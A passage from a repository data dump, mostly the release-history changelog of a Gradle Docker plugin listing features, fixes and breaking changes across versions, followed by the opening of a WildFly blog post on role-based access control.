752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* **Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have all its keys\/values resolved to java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDE's. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. It's `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fallback to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fallback to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow user to define a list of successful exit codes the exec is allowed to return and will fail if not in list. Default behavior is to do no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running containers logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time issue stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during gradles config-phase. - {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` than fallback to using generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump verison of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor or jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standatds - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump verison of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump verison of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump verison of docker-java to 3.0.11 - {uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows to inspect exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`, instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump vof docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per singled ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups as well default to alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix when not checking if parent dir already exists before creating with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overriden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` call a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - v[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2014)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly add user-based instructions to Dockfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d1de82a92a1b4f1bd202b241a5403a635b07972","subject":"Add commas","message":"Add commas\n","repos":"luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org","old_file":"news\/2013-11-07-Role-Based-Access-Control-in-WildFly-8.adoc","new_file":"news\/2013-11-07-Role-Based-Access-Control-in-WildFly-8.adoc","new_contents":"= Role Based Access Control in WildFly 8\nbstansberry\n2013-11-07\n:revdate: 2013-11-07 12:39:25 -0600\n:awestruct-tags: [management, rbac, wildfly8, videos]\n:awestruct-layout: blog\n:source-highlighter: coderay\n\nOne of the big new features in WildFly 8 is the ability to enforce role based access control on managmeent operations. I recorded some videos that describe how you can use this powerful feature, and also demonstrate it in action. Check them out!\n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78780176\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78780176\">Role Based Access Control in WildFly 8 (Part 1 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the first part of the series, I walk through 